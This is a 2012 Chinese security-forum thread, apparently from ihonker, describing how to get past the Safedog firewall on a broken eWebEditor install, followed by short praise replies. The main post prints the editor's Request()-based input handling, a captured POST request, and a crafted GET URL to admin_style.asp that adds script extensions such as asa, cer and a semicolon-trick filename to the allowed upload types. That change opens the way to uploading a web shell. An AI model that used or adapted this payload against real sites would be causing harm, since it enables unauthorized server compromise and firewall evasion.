查看: 27187|回复: 24

问题ewebeditor编辑器突破安全狗

[复制链接]
  • TA的每日心情

    2016-5-24 16:08
  • 签到天数: 5 天

    [LV.2]偶尔看看I

    发表于 2012-9-1 00:43:23 | 显示全部楼层 |阅读模式
    题目说到了问题和突破,问题的ewebeditor程序,这儿程序问题出来哪儿呢?
            1.登陆的地方被删除了,也就是admin_login.asp这个页面被删除了。
            2.是post提交好像有问题,不管点击那个提交post都会跳转到登陆页面,但是登陆页面又没有,如果直接访问那个页面,当然也可以访问。
        当然上边说到的突破,所谓突破也就是说非常规的环境,非常规的手法去实现同一个目的。下面说一下这个非常规的环境。
            1.问题ewebeditor
            2.服务器装有安全狗
        下面是我测试的过程:
            首先当然是增加样式,但是常规的post提交失败,于是我想到了想这样的在老程序他一般都是使用request接受数据的,于是乎我下载了源码看了下,如果如此:
    1.     ' 检测样式表单提交的有效性
    2. sStyleName = Trim(Request("d_name"))
    3. sStyleDir = Trim(Request("d_dir"))
    4. sStyleCSS = Trim(Request("d_css"))
    5. sStyleUploadDir = Trim(Request("d_uploaddir"))
    6. sStyleBaseHref = Trim(Request("d_basehref"))
    7. sStyleContentPath = Trim(Request("d_contentpath"))
    8. sStyleWidth = Trim(Request("d_width"))
    9. sStyleHeight = Trim(Request("d_height"))
    10. sStyleMemo = Request("d_memo")
    11. sStyleImageExt = Request("d_imageext")
    12. sStyleFlashExt = Request("d_flashext")
    13. sStyleMediaExt = Request("d_mediaext")
    14. sStyleRemoteExt = Request("d_remoteext")
    15. sStyleFileExt = Request("d_fileext")
    16. sStyleImageSize = Request("d_imagesize")
    17. sStyleFlashSize = Request("d_flashsize")
    18. sStyleMediaSize = Request("d_mediasize")
    19. sStyleRemoteSize = Request("d_remotesize")
    20. sStyleFileSize = Request("d_filesize")
    21. sStyleStateFlag = Request("d_stateflag")
    22. sStyleAutoRemote = Request("d_autoremote")
    23. sStyleShowBorder = Request("d_showborder")
    24. sStyleUploadObject = Request("d_uploadobject")
    25. sStyleAutoDir = Request("d_autodir")
    26. sStyleDetectFromWord = Request("d_detectfromword")
    27. sStyleInitMode = Request("d_initmode")
    28. sStyleBaseUrl = Request("d_baseurl")
    复制代码
    他的数据接受都是request,也就是说他会接受post和get和cookie提交上去的数据。
        当然此处post失效了,所以我抓了下包,得到如下数据

    1. [url=http://xxxx.com/system/eWebEditor/admin_style.asp?action=StyleSetSave&id=50]http://xxxx.com/system/eWebEdito ... =StyleSetSave&id=50[/url]

    2. POST /system/eWebEditor/admin_style.asp?action=StyleSetSave&id=50 HTTP/1.1
    3. Host: xxxx.com
    4. User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0
    5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    6. Accept-Language: en-US,en;q=0.5
    7. Accept-Encoding: gzip, deflate
    8. Connection: keep-alive
    9. Referer: [url=http://xxxx.com/system/eWebEditor/admin_style.asp?action=styleset&id=50]http://xxxx.com/system/eWebEdito ... tion=styleset&id=50[/url]
    10. Cookie: ASPSESSIONIDSABCQBBT=KHLJMNEAEKNNMGAMJAFHCPOK
    11. Content-Type: application/x-www-form-urlencoded
    12. Content-Length: 740
    13. d_name=standard1&d_initmode=EDIT&d_uploadobject=0&d_autodir=0&d_dir=standard&d_css=office&d_width=550&d_height=350&d_stateflag=1&d_detectfromword=true&d_autoremote=1&d_showborder=0&d_baseurl=1&d_uploaddir=UploadFile%2F&d_basehref=&d_contentpath=&d_imageext=gif%7Cjpg%7Cjpeg%7Cbmp%7C%3Basa.ass%3B.jpg&d_imagesize=500&d_flashext=swf&d_flashsize=100&d_mediaext=rm%7Cmp3%7Cwav%7Cmid%7Cmidi%7Cra%7Cavi%7Cmpg%7Cmpeg%7Casf%7Casx%7Cwma%7Cmov&d_mediasize=100&d_fileext=rar%7Czip%7Cexe%7Cdoc%7Cxls%7Cchm%7Chlp&d_filesize=500&d_remoteext=gif%7Cjpg%7Cjpeg%7Cbmp&d_remotesize=100&d_memo=Office%B1%EA%D7%BC%B7%E7%B8%F1%A3%AC%B2%BF%B7%D6%B3%A3%D3%C3%B0%B4%C5%A5%A3%AC%B1%EA%D7%BC%CA%CA%BA%CF%BD%E7%C3%E6%BF%ED%B6%C8%A3%AC%C4%AC%C8%CF%D1%F9%CA%BD&x=42&y=11
    复制代码
    于是使用构造get提交方式:

    1. [url=http://xxxx.com/system/eWebEditor/admin_style.asp?action=StyleSetSave&id=50&d_name=standard1&d_initmode=EDIT&d_uploadobject=0&d_autodir=0&d_dir=standard&d_css=office&d_width=550&d_height=350&d_stateflag=1&d_detectfromword=true&d_autoremote=1&d_showborder=0&d_baseurl=1&d_uploaddir=%2F&d_basehref=&d_contentpath=&d_imageext=gif%7Cjpg%7Cjpeg%7Cbmp%7Casaspp%7Ccer%7cASA&d_imagesize=500&d_flashext=swf&d_flashsize=100&d_mediaext=rm%7Cmp3%7Cwav%7Cmid%7Cmidi%7Cra%7Cavi%7Cmpg%7Cmpeg%7Casf%7Casx%7Cwma%7Cmov&d_mediasize=100&d_fileext=rar%7Czip%7Cexe%7Cdoc%7Cxls%7Cchm%7Chlp&d_filesize=500&d_remoteext=gif%7Cjpg%7Cjpeg%7Cbmp&d_remotesize=100&d_memo=Office%B1%EA%D7%BC%B7%E7%B8%F1%A3%AC%B2%BF%B7%D6%B3%A3%D3%C3%B0%B4%C5%A5%A3%AC%B1%EA%D7%BC%CA%CA%BA%CF%BD%E7%C3%E6%BF%ED%B6%C8%A3%AC%C4%AC%C8%CF%D1%F9%CA%BD&x=42&y=11]http://xxxx.com/system/eWebEdito ... %F9%CA%BD&x=42&y=11[/url]

    复制代码
    然后直接访问时,他显示是提交成功了,实际上也米有成功,需要我们先访问:
    http://xxxx.com/system/eWebEdito ... tion=styleset&id=50
       
    游客,如果您要查看本帖隐藏内容请回复

    评分

    参与人数 3人气 +2 i币 +30 贡献 +2 收起 理由
    N.O + 2 + 10 + 2 很给力!
    Exploit + 10 很给力!
    苦涩 + 10 很给力!

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情
    无聊
    2015-6-23 09:17
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2012-9-1 01:18:26 | 显示全部楼层
    这些代码我一个都看不懂哇

    点评

    去学点脚本,  详情 回复 发表于 2012-9-1 01:20
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2020-8-3 22:39
  • 签到天数: 84 天

    [LV.6]常住居民II

    发表于 2012-9-1 01:20:42 来自手机 | 显示全部楼层
    莫离 发表于 2012-9-1 01:18
    这些代码我一个都看不懂哇

    去学点脚本,
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2015-6-23 09:17
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2012-9-1 01:28:43 | 显示全部楼层
    Free_小东 发表于 2012-9-1 01:20
    去学点脚本,

    过几天我就上大学了,哈哈,大学里我是学计算机网络技术的,慢慢就懂了,多谢指点!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2012-9-1 11:41:41 | 显示全部楼层
    给力!感谢分享!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2012-9-1 11:48:41 | 显示全部楼层
    看看什么方法
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2012-9-1 13:09:39 | 显示全部楼层
    看看~
    回复 支持 反对

    使用道具 举报

    nick2011 该用户已被删除
    发表于 2012-9-2 08:48:46 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2012-9-2 13:56:44 | 显示全部楼层
    很给力
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2012-9-2 20:24:26 | 显示全部楼层
    又看了一遍。。给力。。好淫荡的思路。。
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-23 02:05 , Processed in 0.045266 second(s), 21 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部